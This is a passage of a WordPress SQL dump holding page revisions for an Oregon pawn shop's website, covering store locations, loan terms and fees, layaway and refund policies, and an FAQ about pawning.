width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2.jpg\"><img class=\"wp-image-91 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2-300x131.jpg\" alt=\"Salem_Outside-2\" width=\"300\" height=\"131\" /></a> 1191 Lancaster Dr. NE[/caption]\r\n\r\n[caption id=\"attachment_90\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_inside-2.jpg\"><img class=\"wp-image-90 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_inside-2-300x155.jpg\" alt=\"Salem_inside-2\" width=\"300\" height=\"155\" /></a> 1191 Lancaster Dr. NE[/caption]\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ','Locations','','inherit','open','open','','83-revision-v1','','','2015-02-15 15:22:49','2015-02-15 23:22:49','',83,'http://atgjewelry.com/fuze7/83-revision-v1/',0,'revision','',0),(103,2,'2015-02-15 15:28:43','2015-02-15 23:28:43','All That Glitters is a family-owned and operated business serving Oregon\'s Pacific Northwest for more than 25 years. We are a member of the National Pawnbroker\'s Association, and active members of the Oregon Pawnbrokers Association.\n\nOur goal is to ensure that every customer is treated in the friendliest and fairest way possible. We do this by offering lifetime stone replacement policies as well as an excellent trade up policy on all of our jewelry. We offer wholesale prices every day with discounts starting at 50% off of Retail Prices on nearly all the jewelry we sell. All other merchandise is researched and priced with you in mind. We want to sell it, we don\'t want to keep it!\n\nAll That Glitters is an established, licensed, bonded and insured business with a reputation to maintain. Our goal is to change the way you view Pawnshops. By providing you with as close to a retail experience as we can, while keeping our prices at wholesale level or below.\n\n<img src=\"http://atgjewelry.com/images/about-bottam.png\" alt=\"\" />','About Company','','inherit','open','open','','31-autosave-v1','','','2015-02-15 15:28:43','2015-02-15 23:28:43','',31,'http://atgjewelry.com/fuze7/31-autosave-v1/',0,'revision','',0),(104,2,'2015-02-15 15:29:42','2015-02-15 23:29:42','All That Glitters is a family-owned and operated business serving Oregon\'s Pacific Northwest for more than 25 years. We are a member of the National Pawnbroker\'s Association, and active members of the Oregon Pawnbrokers Association.\r\n\r\nOur goal is to ensure that every customer is treated in the friendliest and fairest way possible. We do this by offering lifetime stone replacement policies and an excellent trade up policy on all of our jewelry. We offer wholesale prices every day with discounts starting at 50% off of Retail Prices on nearly all the jewelry we sell. All other merchandise is researched and priced with you in mind. We want to sell it, we don\'t want to keep it!\r\n\r\nAll That Glitters is an established, licensed, bonded and insured business with a reputation to maintain. Our goal is to change the way you view Pawnshops by providing you with as close to a retail experience as we can, while keeping our prices at wholesale level or below.\r\n\r\n<img src=\"http://atgjewelry.com/images/about-bottam.png\" alt=\"\" />','About Company','','inherit','open','open','','31-revision-v1','','','2015-02-15 15:29:42','2015-02-15 23:29:42','',31,'http://atgjewelry.com/fuze7/31-revision-v1/',0,'revision','',0),(105,2,'2015-02-15 15:40:02','2015-02-15 23:40:02','<h3>Layaway Policy</h3>\n<ul class=\"listing-check\">\n <li>Layaways are good for 90 days and require a 20% down payment.</li>\n <li>Jewelry Purchase: If you change your mind within the first seven days following the date a jewelry item is put into layaway, you are entitled to receive a refund in the amount of the down payment.</li>\n <li>If you change your mind after seven days following the date a jewelry item is put into layaway, you will be given an in-store credit for any monies paid.</li>\n <li>Hard good Purchase: If, at any time during the 90 day layaway period, you change your mind regarding a layaway purchase, you will not receive a cash refund, but you will be given an in-store credit for the amount of monies paid.</li>\n <li>If you do not complete payment of an item within the 90-day layaway period, you can request an in-store credit within one year of the original date of the layaway. After one year, the funds are forfeited.</li>\n</ul>\nStone Replacement Guarantee\n<ul class=\"listing-check\">\n <li>Subject to 6-month in-house inspection</li>\n <li>The customer is responsible for completing all maintenance suggested by All That Glitters at the time of inspection. All That Glitters Stone Replacement Guarantee is not in effect if the customer chooses not to maintain the jewelry.</li>\n <li>Customer’s receipt must be presented at each inspection.</li>\n <li>This policy guarantees loss of stones due to normal wear and does not cover abuse of jewelry (ie: banging of jewelry against hard surfaces).</li>\n</ul>\nRefund Policy\n<ul class=\"listing-check\">\n <li>Jewelry items are given a 7-day money back guarantee in the same form of payment made.</li>\n <li>Laptops and Tablets are given a 72-hour warranty. If the equipment isn\'t working, just bring it back along with your original receipt within 72 hours for a full refund.</li>\n <li>After 7 days (up to 30) you will receive in-store credit in the form of a gift card.</li>\n <li>After 30 days, you also have the option to sell your jewelry back for half of the amount paid. Offer only good for original purchaser, and you must have the original sales receipt. You may also get a loan on your item any time as long as you keep your receipt. Loans are calculated at half of the amount paid. Original receipt must be presented at every loan transaction.</li>\n <li>All other merchandise is given a 30-day functional guarantee. You can exchange merchandise if it is not working for a like item, or receive a gift card for the amount you paid.</li>\n <li>Clearance case items are AS-IS. No refund, exchange or trade-in allowed.</li>\n <li>All claims and goods MUST be accompanied by the purchaser and the original sales receipt.</li>\n</ul>\nTrade-Up Policy\n\nAll That Glitters offers a wonderful trade-up policy allowing you to upgrade your jewelry purchase at a minimum cost of $50.00.Just keep your original sales receipt, and when you are ready to upgrade your jewelry, bring it in. All That Glitters will give you full value of what you paid towards your next purchase. You only need to spend an additional $50.00 on the new item.\n<ul class=\"listing-check\">\n <li>Trade-ins must be made at 50% of retail.</li>\n <li>Sorry, only one item for one item is allowed. The Policy is set up so you can keep upgrading into the size stone you love.</li>\n <li>Jewelry must be accompanied by a receipt and the person named on the receipt. This offer excludes hard good items and items stamped AS IS.</li>\n <li>Please note trade-up purchases are sold as-is only. No refunds of any kind are granted on a trade-up purchase.</li>\n</ul>\nPrivacy Policy\n<p class=\"check\">All That Glitters collects customer information to improve your overall shopping experience with us. We respect your privacy and are committed to maintaining and using this information responsibly.</p>\nWe collect non-public personal information about you as a consumer, customer or former customer from the following sources:\n<ul class=\"listing-check\">\n <li>Information we receive from you on our loan contracts, buy forms, sales documents or other forms.</li>\n <li>Information about your transactions with us, our affiliates or others.</li>\n</ul>\n<p class=\"check\">We do not disclose any non-public information about our customers or former customers to anyone, except to our affiliates and as permitted by law. We do not give out information over the phone to anyone including you. You must appear in person and present valid ID for us to look up your account information.</p>\nWe restrict access to non-public personal information about you to those employees who need that information to provide products or services to you and maintain safeguards that restrict access to your non-public personal information.\n\nPolicy Changes and Questions\n<p class=\"check\">All That Glitters may update our privacy policy from time to time and use of the information we collect is now subject to the privacy policy in effect at the time of use. If you have any questions or concerns regarding our privacy policy, please contact us.</p>','Guidelines/Policies','','inherit','open','open','','45-autosave-v1','','','2015-02-15 15:40:02','2015-02-15 23:40:02','',45,'http://atgjewelry.com/fuze7/45-autosave-v1/',0,'revision','',0),(107,2,'2015-03-10 22:10:10','2015-03-11 05:10:10','<h2>Quick and Easy...Cash Loans Today!</h2>\n[row_fluid]\n[one_half]\n<ul class=\"listing-check\">\n <li>Bring in your merchandise and let us know how much you would like to borrow.</li>\n <li>Our trained staff will evaluate the item(s) and discuss its loan value with you.</li>\n <li>We will explain the terms, and answer any questions you might have about the procedure.</li>\n <li>Sign the documents and leave with cash..it\'s just that easy!</li>\n</ul>\n<strong>Loan Terms:</strong>\n\nLoans are held for 60 days, and may be extended by paying a finance charge. A finance charge is based on the amount you borrow, and is calculated as follows:\n<ul class=\"listing-check\">\n <li>Interest: Three percent per month. One month minimum interest on all loans or $3.00, whichever is greater.</li>\n <li>Set-up Fee: 10% of loan amount on all loans and all loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\n <li>Storage Fee: 3% of loan amount on all loans and loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\n <li>Gun Fee: $3.00 on new loans, plus any fee that a government agency imposes on the PLEDGEE for holding or transferring a firearm.</li>\n <li>Lost, Destroyed or Stolen Ticket Fee: A fee of $3.00 per loan contract.</li>\n</ul>\n<img class=\"alignleft wp-image-217 size-large\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guitars--1024x683.jpg\" alt=\"Electric Guitar\" width=\"604\" height=\"403\" />\n\n[/one_half]\n[one_half]\n<div class=\"loans\">\n<ul class=\"listing-check\">\n <li>Storage Fee: 3% of loan amount on all loans and loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\n <li>Gun Fee: $3.00 on new loans, plus any fee that a government agency imposes on the PLEDGEE for holding or transferring a firearm.</li>\n <li>Lost, Destroyed or Stolen Ticket Fee: A fee of $3.00 per loan contract.</li>\n</ul>\n<p class=\"loans-left\">We loan on Gold, Platinum and/or Silver Jewelry. Items can be missing stones, broken or 100% re-sellable. Bring it in - we\'ll take a look at it and try to give you the most cash we can! Sorry, we cannot accept plated or gold-filled jewelry.</p>\n\n<div class=\"loans-left\"></div>\n<div class=\"loans-left\"><strong>We also loan on a wide variety of Electronics, Videos / DVDs, Firearms, and Guitars! </strong></div>\n<div class=\"loans-left\"></div>\n<div class=\"loans-left\"><a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guns.jpg\"><img class=\" alignleft wp-image-211 size-large\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guns-1024x651.jpg\" alt=\"Guns\" width=\"604\" height=\"384\" /></a></div>\n<div class=\"loans-guitar\" style=\"text-align: right;\"></div>\n<div class=\"loans-firearms\"></div>\n</div>\n[/one_half]\n[/row_fluid]','Loans','','inherit','open','open','','34-autosave-v1','','','2015-03-10 22:10:10','2015-03-11 05:10:10','',34,'http://atgjewelry.com/fuze7/34-autosave-v1/',0,'revision','',0),(109,2,'2015-02-21 13:16:38','2015-02-21 21:16:38',' ','','','publish','open','open','','109','','','2015-03-10 19:02:03','2015-03-11 02:02:03','',31,'http://atgjewelry.com/fuze7/?p=109',8,'nav_menu_item','',0),(272,2,'2015-03-21 17:13:18','2015-03-22 00:13:18','','Lombard_no_table_new_logo_BL-2','','inherit','open','open','','lombard_no_table_new_logo_bl-2','','','2015-03-21 17:13:18','2015-03-22 00:13:18','',0,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Lombard_no_table_new_logo_BL-2.jpg',0,'attachment','image/jpeg',0),(115,2,'2015-02-23 18:53:20','2015-02-24 02:53:20','<h2>Quick and Easy...Cash Loans Today!</h2>\r\n[row_fluid]\r\n[one_half]\r\n<ul class=\"listing-check\">\r\n <li>Bring in your merchandise and let us know how much you would like to borrow.</li>\r\n <li>Our trained staff will evaluate the item(s) and discuss its loan value with you.</li>\r\n <li>We will explain the terms, and answer any questions you might have about the procedure.</li>\r\n <li>Sign the documents and leave with cash..it\'s just that easy!</li>\r\n</ul>\r\n<strong>Loan Terms:</strong>\r\n\r\nLoans are held for 60 days, and may be extended by paying a finance charge. A finance charge is based on the amount you borrow, and is calculated as follows:\r\n<ul class=\"listing-check\">\r\n <li>Interest: Three percent per month. One month minimum interest on all loans or $3.00, whichever is greater.</li>\r\n <li>Set-up Fee: 10% of loan amount on all loans and all loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Storage Fee: 3% of loan amount on all loans and loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Gun Fee: $3.00 on new loans, plus any fee that a government agency imposes on the PLEDGEE for holding or transferring a firearm.</li>\r\n <li>Lost, Destroyed or Stolen Ticket Fee: A fee of $3.00 per loan contract.</li>\r\n</ul>\r\nWe loan on Gold, Platinum and/or Silver Jewelry. Items can be missing stones, broken or 100% resellable. Bring it in - we\'ll take a look at it and try to give you the most cash we can! <strong>Sorry, we cannot accept plated or gold-filled jewelry.</strong>\r\n\r\n[/one_half]\r\n[one_half]\r\n<div class=\"loans\">\r\n<div class=\"loans-left\"><strong>We also loan on a wide variety of electronics - Video games </strong>\r\n<img src=\"http://atgjewelry.com/images/video-games.png\" alt=\"\" width=\"280\" height=\"186\" /></div>\r\n<div class=\"loans-guitar\" style=\"text-align: right;\"><strong>Guitars</strong>\r\n<img class=\" alignright\" src=\"http://atgjewelry.com/images/guitars.png\" alt=\"\" width=\"202\" height=\"186\" /></div>\r\n<div class=\"loans-firearms\"><strong>Firearms</strong>\r\n<img src=\"http://atgjewelry.com/images/firearms.jpg\" alt=\"\" width=\"279\" height=\"186\" /></div>\r\n</div>\r\n[/one_half]\r\n[/row_fluid]','Loans','','inherit','open','open','','34-revision-v1','','','2015-02-23 18:53:20','2015-02-24 02:53:20','',34,'http://atgjewelry.com/fuze7/34-revision-v1/',0,'revision','',0),(116,2,'2015-02-23 18:54:21','2015-02-24 02:54:21','<h2>Quick and Easy...Cash Loans Today!</h2>\r\n[row_fluid]\r\n[one_half]\r\n<ul class=\"listing-check\">\r\n <li>Bring in your merchandise and let us know how much you would like to borrow.</li>\r\n <li>Our trained staff will evaluate the item(s) and discuss its loan value with you.</li>\r\n <li>We will explain the terms, and answer any questions you might have about the procedure.</li>\r\n <li>Sign the documents and leave with cash..it\'s just that easy!</li>\r\n</ul>\r\n<strong>Loan Terms:</strong>\r\n\r\nLoans are held for 60 days, and may be extended by paying a finance charge. A finance charge is based on the amount you borrow, and is calculated as follows:\r\n<ul class=\"listing-check\">\r\n <li>Interest: Three percent per month. One month minimum interest on all loans or $3.00, whichever is greater.</li>\r\n <li>Set-up Fee: 10% of loan amount on all loans and all loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Storage Fee: 3% of loan amount on all loans and loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Gun Fee: $3.00 on new loans, plus any fee that a government agency imposes on the PLEDGEE for holding or transferring a firearm.</li>\r\n <li>Lost, Destroyed or Stolen Ticket Fee: A fee of $3.00 per loan contract.</li>\r\n</ul>\r\n \r\n\r\n[/one_half]\r\n[one_half]\r\n<div class=\"loans\">\r\n<p class=\"loans-left\">We loan on Gold, Platinum and/or Silver Jewelry. Items can be missing stones, broken or 100% resellable. Bring it in - we\'ll take a look at it and try to give you the most cash we can! Sorry, we cannot accept plated or gold-filled jewelry.</p>\r\n\r\n<div class=\"loans-left\"></div>\r\n<div class=\"loans-left\"><strong>We also loan on a wide variety of electronics - Video games </strong>\r\n<img src=\"http://atgjewelry.com/images/video-games.png\" alt=\"\" width=\"280\" height=\"186\" /></div>\r\n<div class=\"loans-guitar\" style=\"text-align: right;\"><strong>Guitars</strong>\r\n<img class=\" alignright\" src=\"http://atgjewelry.com/images/guitars.png\" alt=\"\" width=\"202\" height=\"186\" /></div>\r\n<div class=\"loans-firearms\"><strong>Firearms</strong>\r\n<img src=\"http://atgjewelry.com/images/firearms.jpg\" alt=\"\" width=\"279\" height=\"186\" /></div>\r\n</div>\r\n[/one_half]\r\n[/row_fluid]','Loans','','inherit','open','open','','34-revision-v1','','','2015-02-23 18:54:21','2015-02-24 02:54:21','',34,'http://atgjewelry.com/fuze7/34-revision-v1/',0,'revision','',0),(117,2,'2015-02-23 18:55:22','2015-02-24 02:55:22','This is an example page. It\'s different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:\r\n<blockquote>Hi there! I\'m a bike messenger by day, aspiring actor by night, and this is my blog. I live in Los Angeles, have a great dog named Jack, and I like piña coladas. (And gettin\' caught in the rain.)</blockquote>\r\n...or something like this:\r\n<blockquote>The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.</blockquote>\r\nAs a new WordPress user, you should go to <a href=\"http://atgjewelry.com/fuze7/wp-admin/\">your dashboard</a> to delete this page and create new pages for your content. Have fun!','Sample Page','','inherit','open','open','','2-revision-v1','','','2015-02-23 18:55:22','2015-02-24 02:55:22','',2,'http://atgjewelry.com/fuze7/2-revision-v1/',0,'revision','',0),(118,2,'2015-02-25 09:38:29','2015-02-25 17:38:29','<h1 style=\"text-align: center;\"><strong>5 LOCATIONS, OPEN 7 DAYS A WEEK!</strong></h1>\n<h4 style=\"text-align: center;\"><strong>Monday - Saturday: 10:00 AM - 7:00 PM</strong></h4>\n<h4 style=\"text-align: center;\"><strong>Sunday: 11:00 AM - 5:00 PM</strong></h4>\n<strong>PORTLAND, OR: 2932 N. Lombard 503-247-1019</strong>\n\n[caption id=\"attachment_87\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2.jpg\"><img class=\"wp-image-87 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2-300x215.jpg\" alt=\"2932 N. Lombard\" width=\"300\" height=\"215\" /></a> 2932 N. Lombard<strong>PORTLAND, OR: 12200 SE Division 503-761-9699</strong>[/caption]\n\n[caption id=\"attachment_85\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2.jpg\"><img class=\"wp-image-85 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2-300x221.jpg\" alt=\"Division_outside-2\" width=\"300\" height=\"221\" /></a> 12200 SE Division[/caption]\n\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_inside-2.jpg\"><img class=\"alignnone wp-image-84 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_inside-2-300x192.jpg\" alt=\"\" width=\"300\" height=\"192\" /></a>\n\n<strong>MILWAUKIE, OR: 15114 SE McLoughlin 503-785-1168\n</strong>\n\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside.jpg\"><img class=\"alignnone wp-image-89 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside-300x241.jpg\" alt=\"\" width=\"300\" height=\"241\" /></a>\n\n[caption id=\"attachment_88\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside.jpg\"><img class=\"wp-image-88 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside-300x200.jpg\" alt=\"Milwaukie_inside\" width=\"300\" height=\"200\" /></a> 15114 SE McLoughlin[/caption]\n\n<strong>TIGARD, OR: 12760 SW Pacific Hwy 503-761-9699</strong>\n\n[caption id=\"attachment_93\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Site_Outside-2.jpg\"><img class=\"wp-image-93 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Site_Outside-2-300x199.jpg\" alt=\"Tigard_Site_Outside-2\" width=\"300\" height=\"199\" /></a> 12760 SW Pacific Hwy[/caption]\n\n[caption id=\"attachment_92\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Inside_-2.jpg\"><img class=\"wp-image-92 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Inside_-2-300x177.jpg\" alt=\"Tigard_Inside_-2\" width=\"300\" height=\"177\" /></a> 12760 SW Pacific Hwy[/caption]\n\n<strong>SALEM, OR: 1191 Lancaster Dr. NE 503-362-9939</strong>\n\n[caption id=\"attachment_91\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2.jpg\"><img class=\"wp-image-91 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2-300x131.jpg\" alt=\"Salem_Outside-2\" width=\"300\" height=\"131\" /></a> 1191 Lancaster Dr. NE[/caption]\n\n[caption id=\"attachment_90\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_inside-2.jpg\"><img class=\"wp-image-90 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_inside-2-300x155.jpg\" alt=\"Salem_inside-2\" width=\"300\" height=\"155\" /></a> 1191 Lancaster Dr. NE[/caption]','Locations','','inherit','open','open','','83-autosave-v1','','','2015-02-25 09:38:29','2015-02-25 17:38:29','',83,'http://atgjewelry.com/fuze7/83-autosave-v1/',0,'revision','',0),(131,2,'2015-02-25 09:42:40','2015-02-25 17:42:40','<h1 style=\"text-align: center;\"><strong>5 Oregon Locations, Open 7 Days a Week!</strong></h1>\r\n<h4 style=\"text-align: center;\"><strong>Monday - Saturday: 10:00 AM - 7:00 PM</strong></h4>\r\n<h4 style=\"text-align: center;\"><strong>Sunday: 11:00 AM - 5:00 PM</strong></h4>\r\n<strong>PORTLAND, OR: 2932 N. Lombard 503-247-1019</strong>\r\n\r\n[caption id=\"attachment_87\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2.jpg\"><img class=\"wp-image-87 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2-300x215.jpg\" alt=\"2932 N. Lombard\" width=\"300\" height=\"215\" /></a> 2932 N. Lombard[/caption]\r\n\r\n[caption id=\"attachment_86\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2.jpg\"><img class=\"wp-image-86 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2-300x173.jpg\" alt=\"2932 N. Lombard\" width=\"300\" height=\"173\" /></a> 2932 N. Lombard[/caption]\r\n\r\n<strong>PORTLAND, OR: 12200 SE Division 503-761-9699</strong>\r\n\r\n[caption id=\"attachment_85\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2.jpg\"><img class=\"wp-image-85 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2-300x221.jpg\" alt=\"Division_outside-2\" width=\"300\" height=\"221\" /></a> 12200 SE Division[/caption]\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_inside-2.jpg\"><img class=\"alignnone wp-image-84 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_inside-2-300x192.jpg\" alt=\"\" width=\"300\" height=\"192\" /></a>\r\n\r\n<strong>MILWAUKIE, OR: 15114 SE McLoughlin 503-785-1168\r\n</strong>\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside.jpg\"><img class=\"alignnone wp-image-89 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside-300x241.jpg\" alt=\"\" width=\"300\" height=\"241\" /></a>\r\n\r\n[caption id=\"attachment_88\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside.jpg\"><img class=\"wp-image-88 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside-300x200.jpg\" alt=\"Milwaukie_inside\" width=\"300\" height=\"200\" /></a> 15114 SE McLoughlin[/caption]\r\n\r\n<strong>TIGARD, OR: 12760 SW Pacific Hwy 503-761-9699</strong>\r\n\r\n[caption id=\"attachment_93\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Site_Outside-2.jpg\"><img class=\"wp-image-93 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Site_Outside-2-300x199.jpg\" alt=\"Tigard_Site_Outside-2\" width=\"300\" height=\"199\" /></a> 12760 SW Pacific Hwy[/caption]\r\n\r\n[caption id=\"attachment_92\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Inside_-2.jpg\"><img class=\"wp-image-92 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Inside_-2-300x177.jpg\" alt=\"Tigard_Inside_-2\" width=\"300\" height=\"177\" /></a> 12760 SW Pacific Hwy[/caption]\r\n\r\n<strong>SALEM, OR: 1191 Lancaster Dr. NE 503-362-9939</strong>\r\n\r\n[caption id=\"attachment_91\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2.jpg\"><img class=\"wp-image-91 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2-300x131.jpg\" alt=\"Salem_Outside-2\" width=\"300\" height=\"131\" /></a> 1191 Lancaster Dr. NE[/caption]\r\n\r\n[caption id=\"attachment_90\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_inside-2.jpg\"><img class=\"wp-image-90 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_inside-2-300x155.jpg\" alt=\"Salem_inside-2\" width=\"300\" height=\"155\" /></a> 1191 Lancaster Dr. NE[/caption]','Locations','','inherit','open','open','','83-revision-v1','','','2015-02-25 09:42:40','2015-02-25 17:42:40','',83,'http://atgjewelry.com/fuze7/83-revision-v1/',0,'revision','',0),(121,2,'2015-02-23 19:07:54','2015-02-24 03:07:54','<div class=\"home-content-area\">\r\n<h3>Layaway Policy</h3>\r\nA pawn is a collateral loan. A pawnbroker is one who lends money while holding an item of value as collateral.\r\n<h3>What if I don\'t want to Pawn my item? Will you buy outright?</h3>\r\nWe will purchase any item we would loan on. Usually, for the same amount.\r\n<h3>What do I need to get a loan?</h3>\r\nA state issued drivers license or ID card from any state is required. If you have an out of state ID card, you must present a second piece of ID. By law, we can not take anything from you without ID. *You must be 18 years of age or older to take out a loan.\r\n<h3>Is my transaction confidential?</h3>\r\nAbsolutely, we respect your privacy. All transaction & personal information collected is confidential. See our \"Privacy Policy\".\r\n<h3>Am I guaranteed to get my item back when I repay the loan?</h3>\r\nAbsolutely! As long as you return while the loan is active your property is safely stored. Your pledge will be sold ONLY if you do not return for it within your loan period.\r\n<h3>My loan slip says Bearer Contract, what does that mean?</h3>\r\nIn the state of Oregon, pawn slips are \"Bearer Contracts\". This means that whomever is in possession of your pink slip is considered the owner of your items. We recommend you keep it in a safe.\r\n<h3>Can I get more money later?</h3>\r\nOnce a pawn loan is written, we can not change the amount. If we are able to loan a higher amount you can redeem your item, we may write a new loan for the higher amount.\r\n<h3>I lost my ticket....what now?</h3>\r\nBring in the Identification used to take out your loan (Driver\'s license or ID) & you may redeem your item. There is a $3.00 fee for lost contracts.\r\n<h3>What happens if I don\'t come back for my item?</h3>\r\nIf you don\'t repay the loan, after 90 days (60 days if renewed) the pawned item(s) becomes the property of ATG.\r\n<h3>Can I get my items if it\'s past the due date?</h3>\r\nRest assured, we want everyone to have their property. If the item(s) is still on premises when you arrive, you can buy it back from us. If the item(s) have left the premises, unfortunately, at that point they are unable to be reclaimed.\r\n<h3>Do you offer Layaway?</h3>\r\nWe are pleased to offer \"Interest-Free Layaways\". With just 20% down you can put any item in the store on Layaway for up to 90 days.\r\n<h3>Why buy from us?</h3>\r\nATG is an established, licensed, bonded & insured business with a reputation to maintain. Our industry is closely regulated & monitored. Every single item that passes through our store is not only examined for function & serviceability, it also has its model & serial numbers reported to our local police departments to check against the police databases. This should reassure you. After all, what other store can guarantee that their merchandise has been screened in this way? Why buy second-hand? Our stores offer a great opportunity to purchase items at a reduced price. We offer a 30-day functional warranty on non-jewelry items. Our jewelry is guaranteed & comes with a lifetime stone replacement warranty. See our Sales Policies here.\r\n<h3>How do I know it\'s not stolen?</h3>\r\nQuoted: \"Nationally less than one (1%) percent of all loans are stolen, of those a good 80% are family related. Over 78,000 people are employed in the industry, which contributes 1.6 billion dollars in salaries to the nation\'s economy. Approximately 303 million dollars in sales & property taxes are contributed by the industry. Capital investments of over 9 billion dollars are from the Pawn industry. There are over 34 million customers served yearly by pawnshops.\"\r\n\r\nIn conclusion, there is a great deal of misunderstanding concerning the pawn business. It is a business that combines retail sales with old fashioned banking & serves a clientele that includes all income brackets. Those involved work diligently toward keeping their business legal as well as serving a needed purpose in the community of loaning to those whom the banks will never acknowledge.\r\n\r\n</div>\r\n<div id=\"footer\"></div>\r\n ','Guidelines & Policies','','inherit','open','open','','120-revision-v1','','','2015-02-23 19:07:54','2015-02-24 03:07:54','',120,'http://atgjewelry.com/fuze7/120-revision-v1/',0,'revision','',0),(122,2,'2015-02-23 19:09:43','2015-02-24 03:09:43','','FAQ\'s','','publish','open','open','','122','','','2015-03-10 19:02:03','2015-03-11 02:02:03','',31,'http://atgjewelry.com/fuze7/?p=122',12,'nav_menu_item','',0),(125,2,'2015-03-10 16:05:13','2015-03-10 23:05:13','<div id=\"squares\"><a href=\"#\"><img src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/banner1.jpg\" alt=\"watch\" /></a><a href=\"#\"><img src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/banner2.jpg\" alt=\"watch\" /></a><a href=\"#\"><img src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/banner3.jpg\" alt=\"watch\" /></a></div>\n<h1 style=\"text-align: center;\">All That Glitters, Reinventing The Pawn Shop</h1>\n[row_fluid]\n[one_third]All of our pawn shops are designed with you, the customer, in mind. We strive to offer you an experience that will remind you more of an upscale retail store than a traditional pawn shop...and with our prices on merchandise and large selection, there\'s no reason to pay upscale retail prices again.[/one_third]\n[one_third]At All That Glitters, we believe that quality customer service is a direct result of qualified pawnbrokers working together for the common goal of presenting the public with high quality pre-owned products professionally displayed at prices well below retail.[/one_third]\n[one_third]\nAs our inventory is always changing, be sure and check back often to find that item you need at the price you can afford. At All 